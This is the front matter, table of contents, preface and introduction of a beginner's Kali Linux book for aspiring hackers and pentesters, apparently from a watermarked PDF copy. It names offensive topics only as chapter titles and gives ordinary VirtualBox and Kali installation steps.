OceanofPDF.com

PRAISE FOR
LINUX BASICS FOR HACKERS
“If you’re just getting started or working your way to expert level,
getting a copy of this book might be one of the best things you can do
to develop your cybersecurity skills.”
—SANDRA HENRY-STOCKER, NETWORK WORLD
“The information provided can help even a general user to get more
comfortable with the Linux operating system without feeling
overwhelmed by more complex, security-related topics and usage.
While we could all benefit from more attention to security, Linux
Basics for Hackers just might inspire the next crop of budding techies
into the security rock stars of tomorrow.”
—TIM EVERSON, THE ETHICAL HACKER NETWORK
“Linux Basics for Hackers is immediately practical. Its quick-and-
dirty approach to exploring and using a Linux system was welcome.”
—JESSE SMITH, DISTROWATCH WEEKLY
“A crisp, well-written, and highly effective introduction to Linux for
budding pentesters and SOC analysts . . . an ideal first book on Linux

for any aspiring red or blue team member, and reading it is well
worth your time.”
—CYBRARY
“If you are starting out in computer science and want to get up to
speed quickly on Linux- and Unix-like operating systems, working
through this book will put you well ahead of your fellow students, and
quickly.”
—GREG LADEN, GREG LADEN’S BLOG
OceanofPDF.com

LINUX BASICS FOR HACKERS
2nd Edition
Getting Started with Networking, Scripting, and Security in Kali
by OccupyTheWeb
San Francisco
OceanofPDF.com

LINUX BASICS FOR HACKERS, 2ND EDITION. Copyright © 2025
by OccupyTheWeb.
All rights reserved. No part of this work may be reproduced or transmitted
in any form or by any means, electronic or mechanical, including
photocopying, recording, or by any information storage or retrieval system,
without the prior written permission of the copyright owner and the
publisher.
First printing
29 28 27 26 25 1 2 3 4 5
ISBN-13: 978-1-7185-0354-0 (print)
ISBN-13: 978-1-7185-0355-7 (ebook)
Published by No Starch Press , Inc.
245 8th Street, San Francisco, CA 94103
phone: +1.415.863.9900
www.nostarch.com; info@nostarch.com
Publisher: William Pollock
Managing Editor: Jill Franklin
®

Production Manager: Sabrina Plomitallo-González
Production Editor: Jennifer Kepler
Developmental Editors: Liz Chadwick and Jill Franklin
Cover Illustrator: Josh Ellingson
Interior Design: Octopod Studios
Technical Reviewer: Artur Zielinski
Copyeditor: Jennifer Kepler
Proofreader: Allison Felus
Indexer: BIM Creatives, LLC
The Library of Congress has catalogued the first edition as follows:
Names: OccupyTheWeb, author.
Title: Linux basics for hackers : getting started with networking, scripting,
and security in Kali / OccupyTheWeb.
Description: First edition. | San Francisco : No Starch Press, Inc., [2018].
Identifiers: LCCN 2018030544 (print) | LCCN 2018032646 (ebook) | ISBN

9781593278564 (epub) | ISBN 159327856X (epub) | ISBN 9781593278557
(print)
| ISBN 1593278551 (print) | ISBN 9781593278564 (ebook) | ISBN
159327856X
(ebook)
Subjects: LCSH: Penetration testing (Computer security) | Kali Linux. |
Hackers. | Operating systems (Computers)
Classification: LCC QA76.9.A25 (ebook) | LCC QA76.9.A25 O325 2018
(print) |
DDC 005.8--dc23
LC record available at https://lccn.loc.gov/2018030544
For customer service inquiries, please contact info@nostarch.com. For
information on distribution, bulk sales, corporate sales, or translations:
sales@nostarch.com. For permission to translate this work:
rights@nostarch.com. To report counterfeit copies or piracy:
counterfeit@nostarch.com. The authorized representative in the EU for
product safety and compliance is EU Compliance Partner, Pärnu mnt. 139b-
14, 11317 Tallinn, Estonia, hello@eucompliancepartner.com,
+3375690241.

No Starch Press and the No Starch Press iron logo are registered trademarks
of No Starch Press, Inc. Other product and company names mentioned
herein may be the trademarks of their respective owners. Rather than use a
trademark symbol with every occurrence of a trademarked name, we are
using the names only in an editorial fashion and to the benefit of the
trademark owner, with no intention of infringement of the trademark.
The information in this book is distributed on an “As Is” basis, without
warranty. While every precaution has been taken in the preparation of this
work, neither the author nor No Starch Press, Inc. shall have any liability to
any person or entity with respect to any loss or damage caused or alleged to
be caused directly or indirectly by the information contained in it.
OceanofPDF.com

To my three incredible daughters.
You mean the world to me.
And to the brave men and women warriors and cyberwarriors of Ukraine
who have bravely resisted one of the world’s largest armies for over three
years. Your skill and courage are inspiring to all of us.
OceanofPDF.com

About the Author
OccupyTheWeb (OTW) is the pseudonym for the founder and primary
writer for the hacker and pentester training website https://www.hackers-
arise.com. He is a former college professor and has over 20 years of
experience in the information technology industry. He has trained hackers
throughout the US, including branches of the US military (Army, Air Force,
and Navy) and the US intelligence community (CIA, NSA, and DNI), and
he played a key role in the hacker community’s resistance to the Russian
invasion of Ukraine. He is also an avid mountain biker and snowboarder.
OceanofPDF.com

About the Technical Reviewer
Artur Zielinski is a penetration tester who mostly focuses on offensive
security (penetration testing, ethical hacking, red teaming, OSINT,
ICS/SCADA hacking, and biohacking). Zielinski also leads cybersecurity-
related activities for children in schools (a day in the life of an ethical
hacker, cybersecurity tournaments, and escape rooms), and he’s the father
of three fantastic children.
OceanofPDF.com

BRIEF CONTENTS
1. Preface
2. Acknowledgments
3. Introduction
4. Chapter 1: Getting Started with the Basics
5. Chapter 2: Text Manipulation
6. Chapter 3: Analyzing and Managing Networks
7. Chapter 4: Adding and Removing Software
8. Chapter 5: Controlling File and Directory Permissions
9. Chapter 6: Process Management
10. Chapter 7: Managing User Environment Variables
11. Chapter 8: Bash Scripting
12. Chapter 9: Compressing and Archiving
13. Chapter 10: Filesystem and Storage Device Management
14. Chapter 11: The Logging System
15. Chapter 12: Using and Abusing Services
16. Chapter 13: Becoming Secure and Anonymous
17. Chapter 14: Understanding and Inspecting Wireless Networks
18. Chapter 15: Managing the Linux Kernel and Loadable Kernel Modules
19. Chapter 16: Automating Tasks with Job Scheduling
20. Chapter 17: Python Scripting Basics for Hackers
21. Chapter 18: Artificial Intelligence for Hackers
22. Index

OceanofPDF.com

CONTENTS IN DETAIL
1. PREFACE
2. ACKNOWLEDGMENTS
3. INTRODUCTION
1. What’s in This Book
2. What Is Ethical Hacking?
1. Penetration Testing
2. Military and Espionage
3. Why Hackers Use Linux
1. Linux Is Open Source
2. Linux Is Transparent
3. Linux Offers Granular Control
4. Most Hacking Tools Are Written for Linux
5. The Future Belongs to Linux/Unix
4. Downloading Kali Linux
5. Virtual Machines
1. Installing VirtualBox
6. Setting Up Your Virtual Machine
1. Installing Kali on the VM
7. Setting Up Kali
8. Installing Kali Through the Windows Subsystem for Linux
4. 1
GETTING STARTED WITH THE BASICS

1. Introductory Terms and Concepts
2. A Tour of Kali
1. The Terminal
2. The Linux Filesystem
3. Basic Commands in Linux
1. Finding Yourself with pwd
2. Checking Your Login with whoami
3. Navigating the Linux Filesystem
4. Getting Help
5. Referencing Manual Pages with man
4. Finding Stuff
1. Searching with locate
2. Finding Binaries with whereis
3. Finding Binaries in the PATH Variable with which
4. Performing More Powerful Searches with find
5. Filtering with grep
5. Modifying Files and Directories
1. Creating Files
2. Creating a Directory
3. Copying a File
4. Renaming a File
5. Removing a File
6. Removing a Directory
6. Go Play Now!

7. Exercises
5. 2
TEXT MANIPULATION
1. Viewing Files
1. Finding the Head
2. Finding the Tail
3. Numbering the Lines
2. Filtering Text with grep
3. Using sed to Find and Replace
4. Viewing Files with more and less
1. Controlling the Display with more
2. Displaying and Filtering with less
5. Summary
6. Exercises
6. 3
ANALYZING AND MANAGING NETWORKS
1. Analyzing Networks with ifconfig
2. Network Statistics with netstat and ss
3. Checking Wireless Network Devices with iwconfig
4. Changing Your Network Information
1. Assigning a New IP Address
2. Changing Your Network Mask and Broadcast Address
3. Spoofing Your MAC Address
4. Assigning New IP Addresses from the DHCP Server

5. Manipulating the Domain Name System
1. Examining DNS with dig
2. Changing Your DNS Server
3. Mapping Your Own IP Addresses
6. Summary
7. Exercises
7. 4
ADDING AND REMOVING SOFTWARE
1. Using apt to Handle Software
1. Searching for a Package
2. Adding Software
3. Removing Software
4. Updating Packages
5. Upgrading Packages
2. Adding Repositories to Your sources.list File
3. Using a GUI-Based Installer
4. Installing Software with git
5. Summary
6. Exercises
8. 5
CONTROLLING FILE AND DIRECTORY PERMISSIONS
1. Different Types of Users
2. Granting Permissions
1. Granting Ownership to an Individual User

2. Granting Ownership to a Group
3. Checking Permissions
4. Changing Permissions
1. Changing Permissions with Decimal Notation
2. Changing Permissions with UGO
3. Giving Root Execute Permission on a New Tool
5. Setting More Secure Default Permissions with Masks
6. Special Permissions
1. Granting Temporary Root Permissions with SUID
2. Granting the Root User’s Group Permissions SGID
3. The Outmoded Sticky Bit
4. Special Permissions, Privilege Escalation, and the Hacker
7. Summary
8. Exercises
9. 6
PROCESS MANAGEMENT
1. Viewing Processes
1. Filtering by Process Name
2. Finding the Greediest Processes with top
2. Managing Processes
1. Changing Process Priority with nice
2. Killing Processes
3. Running Processes in the Background
4. Moving a Process to the Foreground

3. Scheduling Processes
4. Summary
5. Exercises
10. 7
MANAGING USER ENVIRONMENT VARIABLES
1. Changing the Default Shell to Bash
2. Viewing and Modifying Environment Variables
1. Viewing All Environment Variables
2. Filtering for Particular Variables
3. Changing Variable Values for a Session
4. Making Variable Value Changes Permanent
3. Changing Your Shell Prompt
4. Changing Your PATH
1. Adding to the PATH Variable
2. How Not to Add to the PATH Variable
5. Creating a User-Defined Variable
6. Summary
7. Exercises
11. 8
BASH SCRIPTING
1. A Crash Course in Bash
2. Your First Script: “Hello, Hackers-Arise!”
1. Setting Execute Permissions
2. Running HelloHackersArise

3. Adding Functionality with Variables and User Input
3. Your Very First Hacker Script: Scan for Open Ports
1. Our Task
2. A Simple Scanner
3. An Improvement to the MySQL Scanner
4. Common Built-in Bash Commands
5. Summary
6. Exercises
12. 9
COMPRESSING AND ARCHIVING
1. What Is Compression?
2. Tarring Files Together
3. Compressing Files
1. Compressing with gzip
2. Compressing with bzip2
3. Compressing with compress
4. Creating Bit-by-Bit or Physical Copies of Storage Devices
5. Summary
6. Exercises
13. 10
FILESYSTEM AND STORAGE DEVICE MANAGEMENT
1. The Device Directory /dev
1. How Linux Represents Storage Devices
2. Drive Partitions

3. Character and Block Devices
4. List Block Devices and Information with lsblk and lsusb
2. Mounting and Unmounting
1. Mounting Storage Devices Manually
2. Unmounting with umount
3. Monitoring Filesystems
1. Getting Information on Mounted Disks
2. Checking for Errors
4. Summary
5. Exercises
14. 11
THE LOGGING SYSTEM
1. The journalctl Utility
2. Log Priorities and Facilities
3. journalctl Queries
4. Using journalctl to Cover Your Tracks
5. Disabling Logging
6. Summary
7. Exercises
15. 12
USING AND ABUSING SERVICES
1. Starting, Stopping, and Restarting Services
2. Creating an HTTP Server with the Apache Web Server
1. Starting with Apache

2. Editing the index.html File
3. Adding Some HTML
4. Seeing What Happens
3. OpenSSH and the Raspberry Spy Pi
1. Setting Up the Raspberry Pi
2. Building the Raspberry Spy Pi
3. Configuring the Camera
4. Starting to Spy
4. Extracting Information from MySQL/MariaDB
1. Starting MySQL or MariaDB
2. Interacting with SQL
3. Setting a Password
4. Accessing a Remote Database
5. Connecting to a Database
6. Exploring Database Tables
7. Examining the Data
5. Summary
6. Exercises
16. 13
BECOMING SECURE AND ANONYMOUS
1. How the Internet Gives Us Away
2. The Onion Router System
1. How Tor Works
2. Security Concerns

3. Proxy Servers
1. Setting Proxies in the Config File
2. Configuring Some More Interesting Options
3. Concerning Security
4. Virtual Private Networks
5. Encrypted Email
6. Summary
7. Exercises
17. 14
UNDERSTANDING AND INSPECTING WIRELESS NETWORKS
1. Wi-Fi Networks
1. Basic Wireless Commands
2. Wi-Fi Recon with aircrack-ng
3. Detecting and Connecting to Bluetooth
1. How Bluetooth Works
2. Bluetooth Scanning and Reconnaissance
4. Summary
5. Exercises
18. 15
MANAGING THE LINUX KERNEL AND LOADABLE KERNEL
MODULES
1. What Is a Kernel Module?
2. Checking the Kernel Version
3. Kernel Tuning with sysctl

4. Managing Kernel Modules
1. Finding More Information with modinfo
2. Adding and Removing Modules with modprobe
3. Inserting and Removing a Kernel Module
5. Summary
6. Exercises
19. 16
AUTOMATING TASKS WITH JOB SCHEDULING
1. Scheduling an Event or Job to Run on an Automatic Basis
1. Scheduling a Backup Task
2. Using crontab to Schedule Your MySQLscanner
3. crontab Shortcuts
2. Using rc Scripts to Run Jobs at Startup
1. Linux Runlevels
2. Adding Services to rc.d
3. Adding Services to Your Bootup via a GUI
4. Summary
5. Exercises
20. 17
PYTHON SCRIPTING BASICS FOR HACKERS
1. Adding Python Modules
2. Getting Started Scripting with Python
1. Variables
2. Comments

3. Functions
3. Lists
4. Modules
5. Object-Oriented Programming (OOP)
6. Network Communications in Python
1. Building a TCP Client
2. Creating a TCP Listener
7. Dictionaries, Control Statements, and Loops
1. Dictionaries
2. Control Statements
3. Loops
8. Improving Our Hacking Scripts
9. Exceptions and Password Crackers
10. Summary
11. Exercises
21. 18
ARTIFICIAL INTELLIGENCE FOR HACKERS
1. Collaboration Is Key
2. Major Players in AI
3. Using AI in Cybersecurity
4. Social Engineering Attacks with AI
5. Using AI to Write a Bash Script
6. Summary
7. Exercises

22. INDEX
OceanofPDF.com

PREFACE
Welcome to the new, updated second edition of Linux Basics for Hackers!
I want to begin by thanking all my readers for making the first edition such
a resounding success. Not only is Linux Basics for Hackers the top-selling
Linux book on Amazon, but it is also the best-selling operating system book
on Amazon, far outpacing all the Windows 10 and 11 books. I am so
grateful. I think people like this book.
The first edition of Linux Basics for Hackers was written in 2017 and
published in 2018. Much has changed in Linux generally and, specifically,
Kali Linux. With this second edition, we are targeting to bring this book to
present (2025), demonstrating new tools and techniques that make using
Linux in a cybersecurity environment easy.
One of the major changes you will note is the use of sudo before all the
commands that require root privileges. In the first edition, we logged in to
the root account and operated from there. As an attacker, that is often the
case, but as a learner, you should avoid logging in to the root account unless
absolutely necessary. In this edition, I am conceding this as a safety
measure of those learning Linux from my book, and every command that
requires root privileges is preceded with a sudo.

Every so often, the software utilities in Linux change. This has happened in
the intervening years where systemd utilities have replaced SysV utilities.
These utilities control the system and service manager in Linux. They affect
the way services are started and stopped in Linux. You will notice changes,
for instance, in how we start a service transitioning from the service (SysV)
command to systemctl (systemd) command. Both work, but Linux is rapidly
moving to the latter, and the former will likely be deprecated (or
discontinued) in the near future, so it is best to adapt to this new style now.
Kali Linux has converted its default shell to the Z shell (zsh). If you are a
beginner, I think you should stay with the bash shell (Bourne-again shell)
because nearly every other Linux system uses bash, not the Z shell.
Fortunately, the developers of Kali gave us an easy option to revert to the
bash shell in their GUI application, kali-tweaks.
We have also updated the sections on Bluetooth and the Linux logging
functions, as both have changed significantly in the intervening time.
Finally, Chapter 18 discusses the future of artificial intelligence in our
industry. Artificial intelligence will not make you obsolete; it will make you
better. Embrace and use it. Those who refuse to learn to use it will soon be
obsolete. Those who embrace and use AI will be the next leaders in our
field.
I’m hoping you enjoy this book even more than the first edition.

OceanofPDF.com

ACKNOWLEDGMENTS
This book could not have been written without the collaboration of several
key people.
First, I want to acknowledge Bill Pollock, publisher of No Starch Press, for
believing in and backing this book.
Second, I want to acknowledge the diligent efforts of my technical
reviewer, Artur Zielinski, for making certain the technical content in this
book is accurate. Any remaining errors or omissions are solely my fault.
Finally, I want to thank and acknowledge all the dedicated professionals at
No Starch Press for their efforts to bring this book to completion and to
market. Thank you.
OceanofPDF.com

INTRODUCTION
Hacking is the most important skill set of the 21st century! I don’t make
that statement lightly. In recent years, every morning’s headlines reaffirm it.
Nations spy on one another to gain secrets, cybercriminals steal billions of

dollars, digital worms demand ransoms from their victims, adversaries
influence each other’s elections, and combatants take down each other’s
utilities. Consider the cyberwar between Ukraine and Russia as an example.
These events are all the work of hackers, and we’re only beginning to
understand their power in our increasingly digital world.
I decided to write this book after working with tens of thousands of aspiring
hackers through Null-Byte, Hackers Arise (https://www.hackers-arise.com),
and nearly every branch of the US military and intelligence agencies
(including the NSA, DIA, CIA, and FBI). These experiences taught me that
many aspiring hackers have little or no experience with Linux, and this lack
of experience is the primary barrier to their starting the journey to becoming
professionals. Almost all the best hacker tools are written in Linux, so
you’ll need some basic Linux skills as a prerequisite to becoming an
experienced, professional hacker. I have written this book to help you get
over this barrier.
Hacking is an elite profession within the IT field. As such, it requires an
extensive and detailed understanding of IT concepts and technologies. At
the most fundamental level, Linux is a requirement. I strongly suggest you
invest time and energy into understanding it if you want to make hacking
and information security your career.
This book is not intended for the experienced hacker or Linux admin.
Instead, it is intended for those who want to get started along the exciting

path of hacking, cybersecurity, and pentesting. It is also intended not as a
complete treatise on Linux or hacking but rather a starting point into these
worlds. It begins with the essentials of Linux and extends into some basic
scripting in both bash and Python. Wherever appropriate, I use hacking
examples to teach these Linux principles.
In this introduction, we’ll look at the growth of ethical hacking for
information security, and I’ll take you through the process of installing a
virtual machine so you can install Kali Linux on your system without
disturbing the operating system you are already running.
What’s in This Book
In the first set of chapters, you’ll become comfortable with the
fundamentals of Linux. Chapter 1 will get you used to the filesystem and
the terminal, and give you some basic commands. Chapter 2 shows you
how to manipulate text to find, examine, and alter software and files.
In Chapter 3, you’ll manage networks. You’ll scan for networks, find
information on connections, and disguise yourself by masking your network
and DNS information.
Chapter 4 teaches you to add, remove, and update software, and how to
keep your system streamlined. In Chapter 5, you’ll manipulate file and
directory permissions to control who can access what. You’ll also learn
some privilege escalation techniques.

Chapter 6 teaches you how to manage services, including starting and
stopping processes and allocating resources to give you greater control. In
Chapter 7, you’ll manage environment variables for optimal performance,
convenience, and even stealth. You’ll find and filter variables, change your
PATH variable, and create new environment variables.
Chapter 8 introduces you to bash scripting, a staple for any serious hacker.
You’ll learn the basics of bash and build a script to scan for target ports that
you might later infiltrate.
Chapters 9 and 10 give you some essential filesystem management skills,
showing you how to compress and archive files to keep your system clean,
copy entire storage devices, and get information on files and connected
disks.
The latter chapters dig deeper into hacking topics. In Chapter 11, you’ll use
and manipulate the logging system to get information on a target’s activity
and cover your own tracks. Chapter 12 shows you how to use and abuse
three core Linux services: Apache web server, OpenSSH, and MySQL.
You’ll create a web server, build a remote video spy, and learn about
databases and their vulnerabilities. Chapter 13 will show you how to stay
secure and anonymous with proxy servers, the Tor network, virtual private
networks, and encrypted email.

Chapter 14 deals with wireless networks. You’ll learn basic networking
commands, then crack Wi-Fi access points and detect and connect to
Bluetooth signals.
Chapter 15 dives deeper into Linux itself with a high-level view of how the
kernel works and how its drivers can be abused to deliver malicious
software. In Chapter 16, you’ll learn essential scheduling skills in order to
automate your hacking scripts. Chapter 17 will teach you core Python
concepts, and you’ll script two hacking tools: a scanner to spy on TCP/IP
connections and a simple password cracker. Chapter 18 explores the
intersection of hacking and artificial intelligence, introducing basic
concepts and demonstrating how AI can assist in cybersecurity.
What Is Ethical Hacking?
With the growth of the information security field in recent years has come
dramatic growth in the field of ethical hacking, also known as white hat
(good guy) hacking. Ethical hacking is the practice of attempting to
infiltrate and exploit a system in order to find out its weaknesses and better
secure it. I segment the field of ethical hacking into two primary
components: penetration testing for a legitimate information security firm
and working for your nation’s military or intelligence agencies. Both are
rapidly growing areas, and demand is strong.
Penetration Testing

As organizations become increasingly security conscious and the cost of
security breaches rises exponentially, many large organizations are
beginning to contract out security services. One of these key security
services is penetration testing. A penetration test is essentially a legal,
commissioned hack to demonstrate the vulnerability of a firm’s network
and systems.
Generally, organizations conduct a vulnerability assessment first to find
potential vulnerabilities in their network, operating systems, and services. I
emphasize potential, as this vulnerability scan includes a significant number
of false positives (things identified as vulnerabilities that really are not). It
is the role of the penetration tester to attempt to hack, or penetrate, these
vulnerabilities. Only then can the organization know whether the
vulnerability is real and decide to invest time and money to close the
vulnerability.
Military and Espionage
Nearly every nation on Earth now engages in cyber espionage and cyber
warfare. The cyberwar in Ukraine has brought cyberwar to the forefront of
everyone’s consciousness, as hackers worldwide have supported Ukraine’s
efforts to remain free. (The hackers at https://www.hackers-arise.com have
played a crucial role in this cyberwar.) In less heated times, one only needs
to scan headlines to see that governments use cyber activities to spy on, and
even attack, military and industrial systems.

Over time, the impact of hacking in these military and intelligence-
gathering activities will become only more significant. Imagine a war of the
future in which hackers can gain access to their adversary’s war plans and
knock out their electric grid, oil refineries, and water systems. In such a
world, the hacker has become a key component of their nation’s defense.
Why Hackers Use Linux
So, why do hackers use Linux over other operating systems? Mostly
because Linux offers a far higher level of control via a few different
methods.
Linux Is Open Source
Unlike Windows, Linux is open source, meaning that the source code of the
operating system is available to you. As such, you can change and
manipulate it as you please. If you are trying to make a system operate in
ways it was not intended to, being able to manipulate the source code is
essential.
Linux Is Transparent
To hack effectively, you must know and understand your operating system
and, to a large extent, the operating system you are attacking. Linux is

totally transparent, meaning we can see and manipulate all its working
parts.
Not so with Windows. Microsoft tries hard to make it as difficult as possible
to know the inner workings of its operating systems, so you never really
know what’s going on “under the hood,” whereas in Linux, you have a
spotlight shining directly on each and every component of the operating
system. This makes working with Linux more effective.
Linux Offers Granular Control
Linux is granular. That means that you have an almost infinite amount of
control over the system. In Windows, you can control only what Microsoft
allows you to control. In Linux, everything can be controlled by the
terminal, at the most miniscule level or the most macro level. In addition,
Linux makes scripting in any of the scripting languages simple and
effective.
Most Hacking Tools Are Written for Linux
Well over 90 percent of all hacking tools are written for Linux. There are
exceptions, of course, such as Cain and Abel and Wikto, but those
exceptions prove the rule. Even when hacking tools such as Metasploit or
nmap are ported for Windows, not all capabilities transfer from Linux.

The Future Belongs to Linux/Unix
This might seem like a radical statement, but I firmly believe that the future
of information technology belongs to Linux and Unix systems. Microsoft
had its day in the 1980s and 1990s, but its growth is slowing.
Since the internet began, Linux/Unix has been the operating system of
choice for web servers due to its stability, reliability, and robustness. Even
today, Linux/Unix is used in two-thirds of web servers and dominates the
market. Embedded systems in routers, switches, and other devices almost
always use a Linux kernel, and the world of virtualization is dominated by
Linux, with both VMware and Citrix built on the Linux kernel.
Over 80 percent of mobile devices run Unix or Linux (iOS is Unix, and
Android is Linux), so if you believe that the future of computing lies in
mobile devices such as tablets and phones (it would be hard to argue
otherwise), then the future is Linux/Unix. Microsoft Windows has just 7
percent of the mobile devices market. Is that the wagon you want to be
hitched to?
Downloading Kali Linux
Before getting started, you need to download and install Kali Linux on your
computer. This is the Linux distribution we will be working with throughout
this book. Linux was first developed by Linus Torvalds in 1991 as an open

source alternative to Unix. Since it is open source, volunteer developers
code the kernel, the utilities, and the applications. This means that there is
no overriding corporate entity overseeing development, and as a result,
conventions and standardization are often lacking.
Kali Linux was developed by Offensive Security as a hacking operating
system built on a distribution of Linux called Debian. There are many
distributions of Linux, and Debian is one of the best. You are probably most
familiar with Ubuntu as a popular desktop distribution of Linux. Ubuntu is
also built on Debian. Other distributions include Red Hat, CentOS, Mint,
Arch, and SUSE. Although they all share the same Linux kernel (the heart
of the operating system that controls the CPU, RAM, and so on), each has
its own utilities, applications, and choice of graphical interface (GNOME,
KDE, and others) for different purposes. As a result, each of these
distributions of Linux looks and feels slightly different. Kali was designed
for penetration testers and hackers and comes with a significant
complement of hacking tools.
I strongly recommend that you use Kali for this book. Although you can use
another distribution, you will likely have to manually download and install
the various tools we will be using, which could mean many hours of
downloading and installing software. In addition, if that distribution is not
built on Debian, there may be other minor differences. You can download
and install Kali from https://www.kali.org.

NOTE
If you’d prefer to install Kali through Windows Subsystem
for Linux (WSL) on a computer running Windows, skip to
“Installing Kali Through the Windows Subsystem for Linux”
on page xxxvii.
From the home page, hover over the Downloads link at the top of the page
and click Download Kali Linux. You’ll then be faced with multiple
download choices. It’s important to choose the right download. Along the
left side of the table, you will see the image name, which is the name of the
version that the link downloads. For instance, you may see an image name
called Kali Linux 64Bit, meaning it’s the full Kali Linux and is suitable for
64-bit systems (most modern systems use a 64-bit Intel or AMD CPU).
To determine what type of CPU is on your system, go to Control Panel ▶
System and Security ▶  System, where it should be listed. If your system is
64-bit, download and install the 64-bit version of the full Kali (not Light,
Lxde, or any of the other alternatives). If you are running an older computer
with a 32-bit CPU, you will need to install the 32-bit version, which appears
lower on the page.
You have a choice of downloading the file via HTTP or Torrent. If you
choose HTTP, Kali will download directly to your system just like any
download and be placed in your Downloads folder. The torrent download is

the peer-to-peer download used by many file-sharing sites. You will need a
torrenting application like BitTorrent to use this option. The Kali file will
then download to the folder in which the torrenting application stores its
downloads.
There are other versions for other types of CPUs, such as the commonly
used ARM architecture found in so many mobile devices. If you are using a
Raspberry Pi, tablet, or other mobile device, make sure you download and
install the ARM architecture version of Kali by scrolling down to Download
ARM Images and clicking Kali ARM Images. (Phone users will likely
prefer Kali NetHunter.)
You should now have Kali downloaded, but before you install anything, I
want to talk a bit about virtual machines. Generally, for the beginner,
installing a Kali virtual image and then running it in a virtual machine such
as VirtualBox or VMWare Workstation is the best solution for learning and
practicing.
Virtual Machines
Virtual machine (VM) technology allows you to run multiple operating
systems from one piece of hardware like your laptop or desktop. This
means that you can continue to run the Windows or macOS operating
system you are familiar with, then run a VM of Kali Linux inside that

operating system. You don’t need to overwrite your existing operating
system to learn Linux.
Numerous VM applications are available from VMware, Oracle, Microsoft,
and other vendors. All are excellent, but here I will show you how to
download and install Oracle’s free VirtualBox.
Installing VirtualBox
You can download VirtualBox at https://www.virtualbox.org. Click the
Download link at the top of the page and select the VirtualBox package for
your computer’s current operating system, which will host VirtualBox VM.
Make sure to download the latest version. When the download has
completed, click the setup file, and you will be greeted by a familiar Setup
Wizard. Click Next, and you should be greeted with the Custom Setup
screen, as in Figure 1.

Figure 1: The Custom Setup dialog
NOTE
These instructions were written with Windows in mind. If
you’re using a Mac, the process may be a little different but
you should be able to follow along.
From this screen, simply click Next. Keep clicking Next until you get to the
Network Interfaces warning screen and then click Yes.

Click Install to begin the process. During this process, you will likely be
prompted several times about installing device software. These are the
virtual networking devices necessary for your VMs to communicate. Click
Install for each one.
When the installation is complete, click Finish.
Setting Up Your Virtual Machine
Now let’s get you started with your VM. VirtualBox should open once it has
installed (if not, open it), and you should be greeted by the VirtualBox
Manager, as seen in Figure 2.
Figure 2: The VirtualBox Manager

As we will be creating a new VM with Kali Linux, click New at the top.
This opens the Create Virtual Machine dialog.
Give your machine a name (any name is okay, but I simply used Kali) and
then select Linux from the Type drop-down menu. Finally, select Debian
(64-bit) from the third drop-down menu (unless you are using the 32-bit
version of Kali, in which case select the Debian 32-bit version). Click Next,
and you’ll see a screen for selecting how much RAM you want to allocate
to this new VM.
As a rule of thumb, I don’t recommend using more than 25 percent of your
total system RAM. That means if you’ve installed 4GB on your physical or
host system, then select just 1GB for your VM, and if you have 16GB on
your physical system, then select 4GB (or 4096MB). The more RAM you
give your VM, the better and faster it will run, but you must also leave
enough RAM for your host operating system and any other VMs you might
want to run simultaneously. Your VMs will not use any RAM when they are
inactive, but they will use hard drive space.
Click Next, and you’ll get to the Hard Disk screen. Choose Create Virtual
Hard Disk and click Create. You should be asked which hard disk file type
to use. Select the suggested default of VDI.
In the next screen, you can decide whether you want the hard drive you are
creating to be allocated dynamically or at a fixed size. If you choose

Dynamically Allocated, the system will not take the entire maximum size
you allocate for the virtual hard disk until you need it, saving more unused
hard disk space for your host system. I suggest you select dynamically
allocated.
Click Next, and you’ll choose the amount of hard drive space to allocate to
the VM and the location of the VM (see Figure 3).
Figure 3: Allocating hard drive space
The default is 8GB. I usually find that to be a bit small and recommend that
you allocate 20GB to 25GB at a minimum. Remember, if you chose to
dynamically allocate hard drive space, it won’t use the space until you need
it, and expanding your hard drive after it has already been allocated can be
tricky, so better to err on the high side.

Click Create, and you’re ready to go!
Installing Kali on the VM
At this point, you should see a screen like Figure 4. Now you’ll need to
install Kali. Note that on the left of the VirtualBox Manager, you should see
an indication that Kali VM is powered off. Click the Start button (green
arrow icon).
Figure 4: The VirtualBox welcome screen
The VirtualBox Manager will then ask where to find the startup disk.
You’ve already downloaded a disk image with the extension .iso, which
should be in your Downloads folder (though if you used a torrent to
download Kali, the .isofile will be in the Downloads folder of your

torrenting application). Click the folder icon to the right, navigate to the
Downloads folder, and select the Kali image file (see Figure 5).
Figure 5: Selecting your startup disk
Then click Start. Congratulations, you’ve just installed Kali on a virtual
machine!
Setting Up Kali

Kali will now open a screen like Figure 6, offering you several startup
choices. I suggest using the graphical install for beginners. Use your
keyboard keys to navigate the menu.
If you get an error when you’re installing Kali into your VirtualBox, it’s
likely because you don’t have virtualization enabled within your system’s
BIOS. Each system and its BIOS are slightly different, so check with your
manufacturer or search online for solutions for your system and BIOS. In
addition, on Windows systems, you will likely need to disable any
competing virtualization software such as Hyper-V. Again, an internet
search for your system should guide you in doing so.

Figure 6: Selecting the install method
You will next be asked to select your language. Make sure you select the
language you are most comfortable working in and then click Continue.
Next, select your location, click Continue, and then select your keyboard
layout.
When you click Continue, VirtualBox will go through a process of detecting
your hardware and network adapters. Just wait patiently as it does so.

Eventually, you will be greeted by a screen asking you to configure your
network, as in Figure 7.
Figure 7: Entering a hostname
The first item it asks for is the name of your host. You can name it anything
you please, but I left mine with the default kali.

Next, you will be asked for the domain name. It’s not necessary to enter
anything here. Click Continue. The next screen, shown in Figure 8, is very
important. Here, you are asked for the password you want to use for the
root user. Beginning with Kali 2020 and later versions, Kali provides you a
username and password set to kali.
Figure 8: Choosing a password

The root user in Linux is the all-powerful system administrator. In this case,
you are a regular user, kali. You can use any password you feel is secure. If
this were a physical system on the internet, I would suggest that you use a
very long and complex password to limit the ability of an attacker to crack
it. But since this is a VM that people can’t access without first accessing
your host operating system, password authentication is less important. Still,
choose wisely.
Click Continue, and you will be asked to set your time zone. Do so and
then continue.
The next screen asks about partition disks (a partition is just what it sounds
like—a portion or segment of your hard drive). Choose Guided – use
entire disk, and Kali will detect your hard drives and set up a partitioner
automatically.
Kali will then warn you that all data on the disk you select will be erased . .
. but don’t worry! This is a virtual disk, and the disk is new and empty, so
this won’t actually do anything. Click Continue.
Kali will now ask whether you want all files in one partition or if you want
to have separate partitions. If this were a production system, you probably
would select separate partitions for /home, /var, and /tmp, but considering
that we will be using this as a learning system in a virtual environment, it is
safe for you to simply select All files in one partition.

Now you be will be asked whether to write your changes to disk. Select
Finish partitioning and write changes to disk. Kali will prompt you once
more to see if you want to write the changes to disk; select Yes and click
Continue (see Figure 9).
Figure 9: Writing changes to disk
Kali will begin to install the operating system. This could take a while, so
be patient. Now is the time to take your bathroom break and get your

favorite beverage.
